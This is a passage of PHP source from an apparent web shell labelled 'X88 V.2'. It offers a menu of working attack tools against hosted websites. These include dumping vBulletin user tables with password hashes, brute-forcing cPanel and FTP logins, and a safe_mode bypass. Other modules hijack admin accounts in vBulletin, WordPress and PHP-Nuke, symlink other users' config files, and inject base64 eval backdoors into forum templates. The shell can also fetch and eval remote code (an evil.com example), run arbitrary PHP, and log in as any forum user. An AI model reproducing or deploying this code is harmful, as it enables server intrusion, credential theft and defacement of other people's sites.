$npass = 'NULL';
} else {
$npass = $pass;
}
echo'<font size=3>You are connected with the mysql server of <font color=yellow>' . $host . '</font> by user : <font
color=yellow>' . $user . '</font> , pass : <font color=yellow>' . $npass . '</font> and selected DB with the name <font
color=yellow>' . $db . '</font></font>';
echo '
<hr color="#00FF00" />';
$re = mysql_query('select * from user');
echo'<table border="1" bgcolor="#000000" bordercolor="lime"
bordercolordark="lime" bordercolorlight="lime"><th><font color=lime>ID</th><th><font color=lime>UserName</th><th><font
color=lime>E-Mail</th><th><font color=lime>PassWord</th></font></font></font></font></font>';
while ($row = mysql_fetch_array($re))
{
echo'<tr><td>' . $row['userid'] . '</td><td>' . $row['username'] . '</td><td>' . $row['email'] . '</td><td>' . $row
['password'] . '</td></tr>';
}
echo'</table>';
echo '
<table border="1" bgcolor="#000000" bordercolor="lime"
bordercolordark="lime" bordercolorlight="lime"><th>';
$count = mysql_num_rows($re);
echo 'Number of users registered is : [ ' . $count . ' ]';
echo '</th></table>';
}
if ($act == 'users'){
echo '
<form name="myform" action="?p=vbhack&act=lst" method="post">
<table border="1" bgcolor="#000000" bordercolor="lime"
bordercolordark="lime" bordercolorlight="lime">
<th><font color=yellow>:::::DATABASE CONFIG:::::</th><th><input type="submit" name="Connect" value="Connect"
/></th><tr><td><font color=yellow>Host : </td><td><input name="host" value="localhost" /></td></tr>
<tr><td><font color=yellow>User : </td><td><input name="user" value="root" /></td></tr>
<tr><td><font color=yellow>Pass : </td><td><input name="pass" value="" /></td></tr>
<tr><td><font color=yellow>Name : </td><td><input name="db" value="vb" /></td></tr>
</table>
</form>';
}
if ($act=='config')
{
echo '
<form name="myform" action="?p=vbhack&act=reconfig" method="post">
<table border="1" bgcolor="#000000" bordercolor="lime"
bordercolordark="lime" bordercolorlight="lime">
<th><font color=yellow>:::::CONFIG PATH:::::</th><th><input type="submit" name="Connect" value="Read" /></th>
<tr><td>PATH : </td><td><input name="path" value="/home/User/public_html/vb/includes/config.php"
/></td></tr></table></form>';
}
echo '
<center>
<table border="1" bgcolor="#000000" bordercolor="lime"
bordercolordark="lime" bordercolorlight="lime"><td><a href="?p=vbhack&act=users"><font color=red size=5>List
Users</a></td><td><a href="?p=vbhack&act=config"><font color=red size=5>ReadConfig</a></td></tr></table>';
break;
case 'cpanelftp':
echo "</td></tr></form>
</td>
<td valign='top'>
<!-- Cpanel And FTP BruteForce Attacker -->
<form method=POST><table width='100%' height='72' border='0' id='Box'><tr>
<center>
<textarea style='border:1px dotted #CCFF00; font-family:Tahoma; font-size:8pt; color:#00FFB2; background-color:#000000' rows='12' name='users' cols='23' >";
@system('ls /var/mail');
echo "</textarea>
<textarea style='border:1px dotted #CCFF00; font-family:Tahoma; font-size:8pt; color:#00FFB2; background-color:#000000' rows='12' name='passwords' cols='23' >123123
123456
1234567
12345678
123456789
abc123
112233
332211
asd123
admin123
password
pass123
webmaster
adminpass</textarea>
<center> <input type='text' name='target' size='16' value='localhost' style='border:1px dotted #CCFF00; font-family:Tahoma; font-size:8pt; color:#60c0ff; background-color:#000000'>
<input name='cracktype' value='cpanel' checked type='radio'><sy>Cpanel (2082)</sy>
<input name='cracktype' value='ftp' type='radio'><sy>Ftp (21)</sy>
<input type='submit' value=' Crack it ! ' name='BruteForceCpanelAndFTP' style='border:1px dotted #CCFF00; font-family:Tahoma; font-size:8pt; color:#60c0ff; background-color:#000000' >
</td></tr></table></form>
</td>
<td valign='top'>
";
if($_POST['BruteForceCpanelAndFTP'])
{
$connect_timeout=5;
set_time_limit(0);
$submit=$_REQUEST['BruteForceCpanelAndFTP'];
$users=$_REQUEST['users'];
$pass=$_REQUEST['passwords'];
$target=$_REQUEST['target'];
$cracktype=$_REQUEST['cracktype'];
if(empty($target))
{
$target = "localhost";
}
function ftp_check($host,$user,$pass,$timeout)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "ftp://$host");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_FAILONERROR, 1);
$data = curl_exec($ch);
if ( curl_errno($ch) == 28 )
{
print "</table>Error : Connection Timeout Please Check The Target Hostname .";
exit;
}
elseif ( curl_errno($ch) == 0 )
{
print "<br><b><font color=red>[+] Cracking Success With Username <font color=lime>($user)<font color=red> and Password <font color=lime>($pass)</font>";
}
curl_close($ch);
}
function cpanel_check($host,$user,$pass,$timeout)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_FAILONERROR, 1);
$data = curl_exec($ch);
if ( curl_errno($ch) == 28 )
{
print "[-] Connection Timeout Please Check The Target Hostname .";
exit;
}
elseif ( curl_errno($ch) == 0 )
{
print "<br><b><font color=red>[+] Cracking Success With Username <font color=lime>($user)<font color=red> and Password <font color=lime>($pass)</font>";
}
curl_close($ch);
}
if(isset($submit) && !empty($submit))
{
if(empty($users) && empty($pass))
{
print "<b><font color=40c0ff>[-] Please Check The Users or Password List Entry . . .";
}
if(empty($users))
{
print "<b><font color=40c0ff>[-] Please Check The Users List Entry . . .";
}
if(empty($pass))
{
print "<b><font color=40c0ff>[-] Please Check The Password List Entry . . ";
}
$userlist=explode("
",$users);
$passlist=explode("
",$pass);
print "</table><b><font color=40c0ff>[~]# Cracking Process Started, Please Wait ...";
foreach ($userlist as $user)
{
$pureuser = trim($user);
foreach ($passlist as $password )
{
$purepass = trim($password);
if($cracktype == "ftp")
{
ftp_check($target,$pureuser,$purepass,$connect_timeout);
}
if ($cracktype == "cpanel")
{
cpanel_check($target,$pureuser,$purepass,$connect_timeout);
}
}
}
}
}
break;
case 'bypass':
if(!empty($_GET['file'])) $file=$_GET['file'];
else if(!empty($_POST['file'])) $file=$_POST['file'];
echo '<table bgcolor=#cccccc width=\"100%\">
<tbody><tr><td align=\"right\" width=100>
<p dir=ltr><font color=#990000 size=5><center> <br> PHP 5.2.9 | 5.2.11 safe_mode & open_basedir bypass <br><br>
</font><form name="form" method="post">
<input type="text" name="file" size="50" value="'.htmlspecialchars($file).'"><input type="submit" name="hardstylez" value="Show"></form></center>';
$level=0;
if(!file_exists("file:"))
mkdir("file:");
chdir("file:");
$level++;
$hardstyle = explode("/", $file);
for($a=0;$a<count($hardstyle);$a++){
if(!empty($hardstyle[$a])){
if(!file_exists($hardstyle[$a]))
mkdir($hardstyle[$a]);
chdir($hardstyle[$a]);
$level++;
}
}
while($level--) chdir("..");
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "file:file:///".$file);
echo '<FONT COLOR="RED"> <center><textarea rows="40" cols="120">';
if(curl_exec($ch)==FALSE)
die(' Sorry...'.htmlspecialchars($file).' doesnt exists or you dont have permissions.');
echo ' </textarea> </center></FONT>';
break;
case 'Encypton':
echo "
<table bgcolor=#cccccc width=\"100%\">
<tbody><tr><td align=\"right\" width=100>
<p dir=ltr><b><font color=white size=5><br><p align=left><center>
Encypton With ( MD5 | Base64 | Crypt | SHA1 | MD4 | SHA256 )<br><br>
<form method=\"POST\">
<font color=\"gray\">String To Encrypt : </font><input type=\"text\" value=\"\" name=\"ENCRYPTION\">
<input type=\"submit\" value=\"Submit\"></form>";
if(!$_POST['ENCRYPTION']=='')
{
$md5 = $_POST['ENCRYPTION'];
echo "<font size=2><font color=gray>MD5 : </font>".md5($md5)."<br>";
echo "<font color=gray>Base64 : </font>".base64_encode($md5)."<br>";
echo "<font color=gray>Crypt : </font>".CRYPT($md5)."<br>";
echo "<font color=gray>SHA1 : </font>".SHA1($md5)."<br>";
echo "<font color=gray>MD4 : </font>".hash("md4",$md5)."<br>";
echo "<font color=gray>SHA256 : </font>".hash("sha256",$md5)."<br>";
}
break;
case 'phpinfo':
echo '</table></head></style></html></body></table></head></style></html></body>';
phpinfo();
echo '</table></head></style></html></body></table></head></style></html></body>';
break;
case 'rename':
if(isset($_POST['fileold']))
{
if(rename($_POST['fileold'],$_POST['filenew']))
{
print "File renamed.";
}
else
{
print "Couldn't rename file.";
}
}
if(isset($_GET['file']))
{
$file = basename(htmlspecialchars($_GET['file']));
}
else
{
$file = "";
}
print "Renaming ".$file." in folder ".realpath('.').".<br>
<form action=\"".$me."?p=rename&dir=".realpath('.')."\" method=POST>
<b>Rename:<br></b><input type=text name=fileold value=\"".$file."\" size=70><br>
<b>To:<br><input type=text name=filenew value=\"\" size=10><br>
<input type=submit value=\"Rename file\">
</form>";
break;
case 'scahlf':
echo "<html>
</td></tr></table><form method='POST' enctype='multipart/form-data' >
</td></tr></table><form method='POST' enctype='multipart/form-data' >
<br>
<b>show_source : </b><input type='text' name='show' value='' size='59' style='color: #ffffff; border: 1px dotted #ffffff; background-color: #000000'></p>
<b>highlight_file : </b><input type='text' name='high' value='' size='59' style='color: #ffffff; border: 1px dotted #ffffff; background-color: #000000'></p>
<input type='submit'' value='Read' style='color: #ffffff; border: 1px dotted #ffffff; background-color: #000000'></form</p>
</form</p>";
if(empty($_POST['show']))
{
}
else
{
$s = $_POST['show'];
echo "<b><h1><font size='4' color='silver'>show_source</font></h1>";
$show = show_source($s);
}
if(empty($_POST['high']))
{
}
else
{
$h = $_POST['high'];
echo "<b><h1><font size='4' color='silver'>highlight_file</font></h1>";
echo "<br>";
$high = highlight_file($h);
}
break;
case 'tooliq':
$form = '<div align="center">
<form action="" method="POST" >
<input name="lo" type="text" value="Localhost" align="LEFT" size="20" /> <input name="db" type="text" value="Database" align="LEFT" size="20" onfocus="if (this.value == \'Database\') this.value = \'\';"/><br><font face=pristina color="#008000" size="4">:: |~ K ~| ::</font><Br><input name="user" type="text" value="Username" align="LEFT" size="12" onfocus="if (this.value == \'Username\') this.value = \'\';"/><input name="pass" type="text" value="PassWord" align="MIDDLE" size="13" onfocus="if (this.value == \'PassWord\') this.value = \'\';"/><input name="tab" type="text" value="TablePrefix" align="LEFT" size="12" onfocus="if (this.value == \'TablePrefix\') this.value = \'\';"/><br>
<input type="submit" value=" submit " />
</form></p>';
$fc = '<p align="center"><b><font face=pristina color="#008000" size="4">:: GreaTs ::</font></b></p>
<p align="center"><font face=pristina color="#008000" size="4">ALI-X ,El3akrab Elmodamer</font></p>
<p align="center"><b><font face=pristina color="#008000" size="4">:: |~ K ~| ::</font></b></p>
';
$x ='<body bgcolor=#000000>
<title>IQ SCRIPT</title>
<p align="center"><b><font face=pristina color="#008000" size="4">IQ SCRIPT<br>~ Karar alShaMi ~</font></b></p>
<p align="center">
<font face=pristina color="#008000" size="4">ADMIN\'S INFORMATIONS HAVE BEEN CHANGED<br> SUCCEFULLY !!<br>USERNAME : admin<br>PASSWORD : iraq </font>
<p align="center">
';
if ($_GET[a] == "vba"){
if ($_POST['db'] == ''){
echo '<title>vbadmin</title>
<body bgcolor=#000000>
<p align="center"><b><font face=pristina color="#008000" size="4">vbadmin<br>~ Karar alShaMi ~</font></b></p>
<p align="center">';
print $form;
print $f;
}
if ($_POST['db'] != '')
{
@mysql_connect($_POST['lo'],$_POST['user'],$_POST['pass']) or die(mysql_error());
@mysql_select_db($_POST['db']) or die(mysql_error());
$z ="UPDATE `".$_POST['tab']."user` SET `username` = 'Karar alShaMi',
`password` = '9ce4d31a52f0a5c50d0b5652581c37fa',
`salt` = '{tg',`usergroupid` = '6' WHERE `".$_POST['tab']."user`.`userid` =1 LIMIT 1 ;";
$ka=@mysql_query($z) or die(mysql_error());
if ($ka){
print '<body bgcolor=#000000>
<title>IQ SCRIPT</title>
<p align="center"><b><font face=pristina color="#008000" size="4">IQ SCRIPT<br>~ Karar alShaMi ~</font></b></p>
<p align="center">
<font face=pristina color="#008000" size="4">ADMIN\'S INFORMATIONS HAVE BEEN CHANGED<br> SUCCEFULLY !!<br>USERNAME : Karar alShaMi<br>PASSWORD : iraq </font>
<p align="center">';
}
}
exit;
}
if ($_GET[a]=="wp"){
if ($_POST['db'] == ''){
print '
<title>wpadmin</title>
<body bgcolor=#000000>
<p align="center"><b><font face=pristina color="#008000" size="4">wpadmin<br>~ Karar alShaMi ~</font></b></p>
<p align="center">
';
print $form;
print $f;
}
if ($_POST['db'] != '')
{
@mysql_connect($_POST['lo'],$_POST['user'],$_POST['pass']) or die(mysql_error());
@mysql_select_db($_POST['db']) or die(mysql_error());
$z ="UPDATE `".$_POST['tab']."users` SET `user_login` = 'Karar alShaMi',
`user_pass` = '\$P\$B8hVXHMs071b.ZLWaIQ18qOKcoskst0',
`user_email` = '[email protected]',
`display_name` = 'Karar alShaMi' WHERE `".$_POST['tab']."users`.`ID` =1 LIMIT 1 ;";
$ka=@mysql_query($z) or die(mysql_error());
if ($ka){
print '
<body bgcolor=#000000>
<title>wpadmin</title>
<p align="center"><b><font face=pristina color="#008000" size="4">wpadmin<br>~ Karar alShaMi ~</font></b></p>
<p align="center">
<font face=pristina color="#008000" size="4">ADMIN\'S INFORMATIONS HAVE BEEN CHANGED<br> SUCCEFULLY !!<br>USERNAME : Karar alShaMi<br>PASSWORD : iraq </font>
<p align="center">
';
}
}
exit;
}
if ($_GET[a]=="sym"){
print"<title>SYMLINK</title>";
if ($_POST['o'] != "ok"){
print'<body bgcolor=#000000>
<p align="center"><b><font face=pristina color="#008000" size="4">SYMLINK<br>~ Karar alShaMi ~</font></b></p>
<p align="center">
<div align="center">
<form action="" method="POST" >
<input name="usr" type="text" value="/home/victim_user/public_html/vb/includes/config.php" align="LEFT" size="50" /> <br><input name="my" type="text" value="'.@getcwd().'/file.txt" align="LEFT" size="50" /><Br>
<input type="hidden" name="o" value="ok">
<input type="submit" value=" Submit " />
</form></p>
';
print $f;
}
else{
$sym = @symlink("$_POST[usr]","$_POST[my]");
print '
<body bgcolor=#000000>
<p align="center"><b><font face=pristina color="#008000" size="4">SYMLINK<br>~ Karar alShaMi ~</font></b></p>
<p align="center">
<p align="center"><b><font face="Pristina" size="4" color="#008000">';
if ($sym){
print
'Done !!</p>
';}
else{print'Error<br>Cannot Be completed';}
print $f;
}
exit;
}
if ($_GET[a]=="nuke"){
if ($_POST['db'] == ''){
print '
<title>Nuke-admin</title>
<body bgcolor=#000000>
<p align="center"><b><font face=pristina color="#008000" size="4">Nuke-admin<br>~ Karar alShaMi ~</font></b></p>
<p align="center">';
print $form;
print $f;
}
if ($_POST['db'] != '')
{
@mysql_connect($_POST['lo'],$_POST['user'],$_POST['pass']) or die(mysql_error());
@mysql_select_db($_POST['db']) or die(mysql_error());
$z ="UPDATE `".$_POST['tab']."_authors` SET `aid` = 'admin' ,`email` = '[email protected]',`pwd` = 'd3b1cee2327cfa357dabf0289958c024' LIMIT 1 ;";
$ka=@mysql_query($z) or die(mysql_error());
if ($ka){
print $x;
}
}
exit;
}
if ($_GET[a]=="indv"){
#header
print'<title>Vb index Changer</title>
<body bgcolor=#000000>
<p align="center"><b><font face=pristina color="#008000" size="4">Vb index Changer<br>~ Karar alShaMi ~</font></b></p>
<p align="center"><font face=pristina color="#008000" size="4">';
$farm = '<div align="center">
<form name="frm" action="" method="POST" >
<input name="lo" type="text" value="Localhost" align="LEFT" size="18" /> <input name="db" type="text" value="Database" align="LEFT" size="18" onfocus="if (this.value == \'Database\') this.value = \'\';"/><Br><input name="user" type="text" value="Username" align="LEFT" size="15" onfocus="if (this.value == \'Username\') this.value = \'\';"/><input name="pass" type="text" value="Password" align="MIDDLE" size="15" onfocus="if (this.value == \'Password\') this.value = \'\';"/><input name="tab" type="text" value="TablePrefix" align="LEFT" size="15" onfocus="if (this.value == \'TablePrefix\') this.value = \'\';"/><br>
<textarea name="code" cols="41" rows="15" wrap="VIRTUAL" onfocus="if (this.value == \'YOUR InDeX\') this.value = \'\';">YOUR InDeX</textarea><br>
<input type="submit" value=" Change " />
';
$fotind = '<font face=pristina color="#008000" size="4">ChanGed Succefully !!</font>';
if ($_GET[ty]=="fhome" and $_POST[user] ==""){
print $farm;
print $f;
exit;}
elseif($_GET[ty]=="fhome" and $_POST[user] !="") {
@mysql_connect($_POST['lo'],$_POST['user'],$_POST['pass']) or die(mysql_error());
@mysql_select_db($_POST['db']) or die(mysql_error());
$inde =str_replace('\','\\',$_POST[code]);
$n ='UPDATE `'.$_POST[tab].'template` SET `template` = \''.$inde.'\'WHERE `title` =\'FORUMHOME\';';
$ka=@mysql_query($n) or die(mysql_error());
if ($ka){
print $fotind;
}
exit;
}
if ($_GET[ty]=="css" && $_POST[user] ==""){
print $farm;
print $f;
exit;}
elseif($_GET[ty]=="css" and $_POST[user] !=""){
@mysql_connect($_POST['lo'],$_POST['user'],$_POST['pass']) or die(mysql_error());
@mysql_select_db($_POST['db']) or die(mysql_error());
$n = 'UPDATE `'.$_POST[tab].'style` SET `css` = \''.$_POST[code].'\', `stylevars` = \'\', `csscolors` = \'\', `editorstyles` = \'\' ;';
$ka=@mysql_query($n) or die(mysql_error());
if ($ka){
print $fotind;
}
exit;
}
if ($_GET[ty]=="spa" && $_POST[user] ==""){
print $farm;
print $f;
exit;}
elseif($_GET[ty]=="spa" and $_POST[user] !=""){
@mysql_connect($_POST['lo'],$_POST['user'],$_POST['pass']) or die(mysql_error());
@mysql_select_db($_POST['db']) or die(mysql_error());
$set_index = "{\${eval(base64_decode(\'";
$index=str_replace("\'","'",$_POST[code]);
$set_index .= base64_encode("echo \"$index\";");
$set_index .= "\'))}}{\${exit()}}</textarea>";
$ka=@mysql_query("UPDATE ".$_POST[tab]."template SET template ='".$set_index."' WHERE title ='spacer_open'") or die(mysql_error());
if ($ka){
print $fotind;
}
exit;
}if ($_GET[ty]=="hea" && $_POST[user] ==""){
print "<script>x=1</script>".$script.$farm;
print $f;
exit;}
elseif($_GET[ty]=="hea" and $_POST[user] !=""){
@mysql_connect($_POST['lo'],$_POST['user'],$_POST['pass']) or die(mysql_error());
@mysql_select_db($_POST['db']) or die(mysql_error());
$set_index = "{\${eval(base64_decode(\'";
$index=str_replace("\'","'",$_POST[code]);
$set_index .= base64_encode("echo \"$index\";");
$set_index .= "\'))}}{\${exit()}}</textarea>";
$ka=@mysql_query("UPDATE ".$_POST[tab]."template SET template ='".$set_index."' WHERE title ='header'") or die(mysql_error());
if ($ka){
print $fotind;
}
exit;
}
print '<p align="center"><a href="?a=indv&ty=fhome"><font face=pristina size="4" color="#008000">FORUMHOME</p></font></p></a>
<p align="center"><a href="?a=indv&ty=spa"><font face=pristina size="4" color="#008000">SPACER_OPEN</p></font></p></a>
<p align="center"><a href="?a=indv&ty=css"><font face=pristina size="4" color="#008000">CSS</p></font></p></a>
<p align="center"><a href="?a=indv&ty=hea"><font face=pristina size="4" color="#008000">Header</p></font></p></a>
';
exit;
}
if ($_GET[a]== 'incl'){
if (empty($_GET['fq'])){
echo '<title>includer</title>
<body bgcolor=#000000>
<p align="center"><b><font face=pristina color="#008000" size="4">InCluder<br>~ Karar alShaMi ~</font></b></p>
<p align="center">';
print'
<div align="center">
<form action="" method="GET">
<input name="fq" type="text" value="http://" align="LEFT" size="30" /> <br>
<input type="hidden" name="a" value="incl">
<u><font size="2" color="#008000">Ex: http://evil.com/shell.txt</font></u><br>
<input type="submit" value=" Submit " />
</form>
';
print $f;
}else{
$file=implode("
",file($_GET[fq]));
$kr=str_replace("<?php", "",$file);
$kr=str_replace("<?", "",$kr);
$kr=str_replace("?>", "",$kr);
eval($kr);
}
exit;
}
if ($_GET[a]=='kil'){
echo '<title>Vb Killer</title>
<body bgcolor=#000000>
<p align="center"><b><font face=pristina color="#008000" size="4">Vb Killer<br>~ Karar alShaMi ~</b></p>
<p align="center">';
if (empty($_POST[db])){
print $script.'
<form name="frm" action="" method="POST" onsubmit="document.frm.code.value = encode64(document.frm.code.value)">
<div align="center">
<select size="1" name="template">
<option value="FAQ">FAQ</option>
<option value="FORUMHOME">FORUMHOME</option>
<option value="search_forums">search_forums</option>
<option value="SHOWGROUPS">SHOWGROUPS</option>
<option value="SHOWTHREAD">SHOWTHREAD</option>
<option value="CALENDAR">CALENDAR</option>
<option value="MEMBERINFO">MEMBERINFO</option>
<option value="footer">footer</option>
<option value="header">header</option>
<option value="headinclude">headinclude</option>
<option value="lostpw">lostpw</option>
<option value="memberlist">memberlist</option></select></p>
<input name="lo" type="text" value="Localhost" align="LEFT" size="18"/> <input name="db" type="text" value="Database" align="LEFT" size="18" onfocus="if (this.value == \'Database\') this.value = \'\';"/><Br><input name="user" type="text" value="Username" align="LEFT" size="15" onfocus="if (this.value == \'Username\') this.value = \'\';"/><input name="pass" type="text" value="PassWord" align="MIDDLE" size="15" onfocus="if (this.value == \'PassWord\') this.value = \'\';"/><input name="tab" type="text" value="TablePrefix" align="LEFT" size="15" onfocus="if (this.value == \'TablePrefix\') this.value = \'\';"/><br>
<textarea name="code" cols="41" rows="15" wrap="VIRTUAL" onfocus="if (this.value == \'Shell CodEs\') this.value = \'\';">Shell CodEs</textarea><br>
<input type="submit" value=" Change "/>';
}else{
$a ="{\${eval(base64_decode(\'";
$template = $_POST['template'];
@mysql_connect($_POST['lo'],$_POST['user'],$_POST['pass']) or die(mysql_error());
@mysql_select_db($_POST['db']) or die(mysql_error());
$p = "UPDATE ".$_POST[tab]."template SET template ='".$a.$_POST[code]."\'))}}{\${exit()}}&' WHERE title ='".$template."'";
$ka= @mysql_query($p) or die(mysql_error());
if ($ka){print'Done !!';}
}
print $f;
exit;
}
if ($_GET[a]=='ins'){
print $script.'<body bgcolor=#000000>
<title>VB CoDeSINseRter</title>
<p align="center"><b><font face=pristina color="#008000" size="4">VB CoDeSINseRter<br>~ Karar alShaMi ~</b></p>
<p align="center">';
if (!$_POST[code]){
print '<div align="center">
<form name="frm" action="" method="POST" onsubmit="document.frm.code.value = vb(document.frm.code.value)">
<select size="1" name="t">
<option value="spacer_open">SPACER_OPEN</option>
<option value="spacer_close">SPACER_CLOSE</option>
</select></p>
<input name="lo" type="text" value="Localhost" align="LEFT" size="18"/> <input name="db" type="text" value="Database" align="LEFT" size="18" onfocus="if (this.value == \'Database\') this.value = \'\';"/><Br><input name="user" type="text" value="Username" align="LEFT" size="15" onfocus="if (this.value == \'Username\') this.value = \'\';"/><input name="pass" type="text" value="PassWord" align="MIDDLE" size="15" onfocus="if (this.value == \'PassWord\') this.value = \'\';"/><input name="tab" type="text" value="TablePrefix" align="LEFT" size="15" onfocus="if (this.value == \'TablePrefix\') this.value = \'\';"/><br>
<textarea name="code" cols="41" rows="15" wrap="VIRTUAL" onfocus="if (this.value == \'HTML CODES\') this.value = \'\';">HTML CODES</textarea><br>
<input type="submit" value=" INSERT " />';
}else{
$lost = $_POST[t];
$a ="{\${eval(base64_decode(\'";
@mysql_connect($_POST['lo'],$_POST['user'],$_POST['pass']) or die(mysql_error());
@mysql_select_db($_POST['db']) or die(mysql_error());
$p = "UPDATE ".$_POST[tab]."template SET template ='".$a.$_POST[code]."\'))}}' WHERE title ='".$lost."'";
$ka= @mysql_query($p) or die(mysql_error());
if ($ka){print"Done !!";}
}
print $f;
exit;
}
if ($_GET[a]=="conf"){
print'<body bgcolor=#000000>
<title>ConFig Reader</title>
<p align="center"><b><font face=pristina color="#008000" size="4">ConFig Reader<br>~ Karar alShaMi ~</b></p>
<p align="center">';
if($_POST[incle] != ""){
$file = @fopen($_POST[incle],r);
$data=@fread($file,1546768);
$data2 =str_replace("<","<",$data);
print '<div align="center"><textarea cols="70" rows="30">'.$data2.'</textarea>';
exit;
}else{
print'<div align="center">
<form action="" method="POST">
<font size="4" color="#008000">:: path ::</font><br>
<input name="incle" type="text" value="'.@getcwd().'" align="LEFT" size="45" /> <br>
<input type="submit" value=" Submit " />';
exit;
}
}
if ($_GET[a]=="fl"){
print'<body bgcolor=#000000>
<title>Edit File</title>
<p align="center"><b><font face=pristina color="#008000" size="4">Edit File<br>~ Karar alShaMi ~</b></p>
<p align="center">';
if($_POST[incl] != ""){
$file = @fopen($_POST[incl],r);
$data=@fread($file,1546768);
$msr = str_replace("\\","\",$_POST[incl]);
print '<form action="" method="POST"><div align="center"><font size="4" color="#008000">:: path ::</font><br>
<div align="center"><input name="incl" type="text" value="'.$msr.'" align="LEFT" size="45" /> <br><input type="submit" value=" Submit " /></form>
<form action="" method="POST"><div align="center"><input name="incle" type="hidden" value="'.$msr.'" align="LEFT" size="45" /><textarea name=\'kr\' cols="70" rows="30">'.htmlspecialchars($data).'</textarea><br><input type="submit" value=" Save " />';
exit;
}
if($_POST[kr]){
$fl = str_replace("\'","'",$_POST[kr]);
$fl = str_replace('\"','"',$fl);
$fl = str_replace('\\','\',$fl);
$d = @fopen($_POST[incle], 'w');
@fwrite($d,$fl);
@fclose($d);
if($d){
print'<font size="4" color="#008000">Saved !!</font><br>';
exit;}else{print'<font size="4" color="#008000">Cann\'t Save !!</font><br>';
exit;}}
print'<div align="center">
<form action="" method="POST">
<font size="4" color="#008000">:: path ::</font><br>
<input name="incl" type="text" value="'.@getcwd().'" align="LEFT" size="45" /> <br>
<input type="submit" value=" Submit " />';
exit;
}
if($_GET[a]=="out"){
print'
<script>document.cookie="user=;";document.cookie="pass=;"; alert("YoU Have Been Logged out Succefully");window.location="?";</script>';
exit;
}
if ($_GET[a]=="ev"){
if(empty($_POST['php'])){
print $script.'<body bgcolor=#000000>
<title>EVAL PHP</title>
<p align="center"><b><font face=pristina color="#008000" size="4">EVAL PHP<br>~ Karar alShaMi ~</b></p>
<p align="center">
<div align="center">
<form name="frm" action="" method="POST" onsubmit="document.frm.php.value = encode64(document.frm.php.value)">
<textarea name="php" cols="41" rows="15" wrap="VIRTUAL" onfocus="if (this.value == \'PHP\') this.value = \'\';">PHP</textarea><br>
<input type="submit" value=" EVAL " />';
}else{
eval(base64_decode($_POST[php]));
}
exit;
}
if ($_GET[a]=="dr"){
if(empty($_POST[user]) and empty($_POST[uid])){
print'<body bgcolor=#000000>
<title>Vb backdoor</title>
<p align="center"><b><font face=pristina color="#008000" size="4">Vb backdoor<br>~ Karar alShaMi ~</b></p>
<p align="center"> <div align="center">
<form action="" method="POST">
<font size="4" color="#008000">:: User ::</font><br>
<input name="user" type="text" value="UserName" align="center" size="45" onfocus="if (this.value ==\'UserName\')this.value = \'\';"/> <input name="ok" type="hidden" value="user" align="center" ><br>
<input type="submit" value=" Submit " /><br><div align="center">
</form>
<form name="a" action="" method="POST">
<font size="4" color="#008000">:: Userid ::</font><br>
<input name="uid" type="text" value="User ID" align="center" size="45" onfocus="if (this.value ==\'User ID\')this.value = \'\';"/> <br>
<input type="submit" value=" Submit " />';
exit;
}else{
define('THIS_SCRIPT', 'login');
require_once('./global.php');
require_once('./includes/functions_login.php');
if ($_POST[ok] == "user"){
$vbulletin->userinfo = $vbulletin->db->query_first("SELECT userid,usergroupid, membergroupids, infractiongroupids, username, password, salt FROM " . TABLE_PREFIX . "user WHERE username = '" . $_POST[user] . "'");
}else{
$vbulletin->userinfo = $vbulletin->db->query_first("SELECT userid,usergroupid, membergroupids, infractiongroupids, username, password, salt FROM " . TABLE_PREFIX . "user WHERE userid = '".$_POST[uid]."'");
}
if (!$vbulletin->userinfo['userid']) die("Invalid informations!");
else
{
vbsetcookie('userid', $vbulletin->userinfo['userid'], true, true, true);
vbsetcookie('password', md5($vbulletin->userinfo['password'] . COOKIE_SALT), true, true, true);
exec_unstrike_user($_POST[user]);
process_new_login('cplogin', TRUE, TRUE);
do_login_redirect();
}
}
}
print'
<title>IQ SCRIPT</title>
<body bgcolor="#000000">
<p align="center"><b><font face=pristina color="#008000" size="4">IQ SCRIPT<br>~ Karar alShaMi ~</font></b></p>
<p align="center"><a href="?p=tooliq&a=vba"><font face=pristina size="4" color="#008000">Vb admin</p></font></p></a>
<p align="center"><a href="?p=tooliq&a=nuke"><font face=pristina size="4" color="#008000">Nuke admin</p></font></p></a>
<p align="center"><a href="?p=tooliq&a=wp"><font face=pristina size="4" color="#008000">WP admin</p></font></p></a>
<p align="center"><a href="?p=tooliq&a=sym"><font face=pristina size="4" color="#008000">SYMLINK</p></font></p></a>
<p align="center"><a href="?p=tooliq&a=indv"><font face=pristina size="4" color="#008000">Vb index Changer</p></font></p></a>
<p align="center"><a href="?p=tooliq&a=incl"><font face=pristina size="4" color="#008000">InCluder</p></font></p></a>
<p align="center"><a href="?p=tooliq&a=kil"><font face=pristina size="4" color="#008000">Vb Killer</p></font></p></a>
<p align="center"><a href="?p=tooliq&a=ins"><font face=pristina size="4" color="#008000">VB CoDeSINseRter</p></font></p></a>
<p align="center"><a href="?p=tooliq&a=conf"><font face=pristina size="4" color="#008000">ConFig Reader</p></font></p></a>
<p align="center"><a href="?p=tooliq&a=ev"><font face=pristina size="4" color="#008000">EVAL PHP</p></font></p></a>
<p align="center"><a href="?p=tooliq&a=fl"><font face=pristina size="4" color="#008000">Edit File</p></font></p></a>
<p align="center"><a href="?p=tooliq&a=dr"><font face=pristina size="4" color="#008000">Vb Backdoor</p></font></p></a>
<p align="center"><a href="?p=tooliq&a=out"><font face=pristina size="4" color="#008000">logout</p></font></p></a>
';
break;
break;
case 'about':
echo '<center><h1 class="style2"><strong><span class="style3">X88 V.2</span></strong></h1>
<p class="style2"> </p>
<p class="style4">ML7s Hacker & Namrod Hacker Priv8</p>
<p class="style4">Namrod <a href="mailto:[email protected]">[email protected]</a></p>
<font SIZE="3">
<p>ML7s Hacker <a href="mailto:[email protected]">[email protected]</a></p>
<p> </p>
</font>
